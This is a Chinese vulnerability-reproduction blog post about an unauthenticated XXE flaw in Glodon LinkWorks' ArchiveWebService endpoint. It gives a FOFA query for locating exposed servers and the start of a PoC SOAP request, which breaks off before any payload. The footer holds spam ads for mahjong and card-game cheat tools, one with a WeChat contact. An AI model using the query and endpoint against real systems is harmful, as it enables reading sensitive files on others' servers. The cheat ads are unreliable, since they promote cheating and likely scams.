广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

指南辅助!雅苑蕲春辅助(辅助)... 指南辅助!雅苑蕲春辅助(辅助)一贯有辅助插件(哔哩哔哩)1、完成雅苑蕲春辅助有辅助插件,帮助玩家取得...
总结辅助!闲逸软件安卓(辅助)... 总结辅助!闲逸软件安卓(辅助)真是一直总是有辅助工具(哔哩哔哩)1、任何闲逸软件安卓透视是真的假的的...
法门辅助!开心庄园辅助器免费(... 法门辅助!开心庄园辅助器免费(辅助)总是是有辅助攻略(哔哩哔哩)1、让任何用户在无需开心庄园辅助器免...
妙招辅助!来玩app辅助器(辅... 妙招辅助!来玩app辅助器(辅助)确实一直总是有辅助脚本(哔哩哔哩)1、来玩app辅助器脚本辅助下载...
资料辅助!花花生活圈可以开挂(... 资料辅助!花花生活圈可以开挂(辅助)原来存在有辅助插件(哔哩哔哩)花花生活圈可以开挂辅助器是一种具有...
练习辅助!老k麻将辅助器(辅助... 练习辅助!老k麻将辅助器(辅助)一贯真的是有辅助技巧(哔哩哔哩)1、老k麻将辅助器透视辅助软件激活码...
教程书辅助!心动休闲辅助(辅助... 您好,心动休闲辅助这款游戏可以开挂的,确实是有挂的,需要了解加去威信【485275054】很多玩家在...
妙招辅助!陕麻圈辅助器透视开挂... 妙招辅助!陕麻圈辅助器透视开挂(辅助)原来真的有辅助软件(哔哩哔哩)一、陕麻圈辅助器透视开挂游戏安装...
演示辅助!兴动休闲辅助(辅助)... 演示辅助!兴动休闲辅助(辅助)切实真的有辅助app(哔哩哔哩)1、兴动休闲辅助脚本辅助下载、兴动休闲...
总结辅助!约战荆门破解(辅助)... 总结辅助!约战荆门破解(辅助)真是真的是有辅助工具(哔哩哔哩)1、约战荆门破解破解器简单,约战荆门破...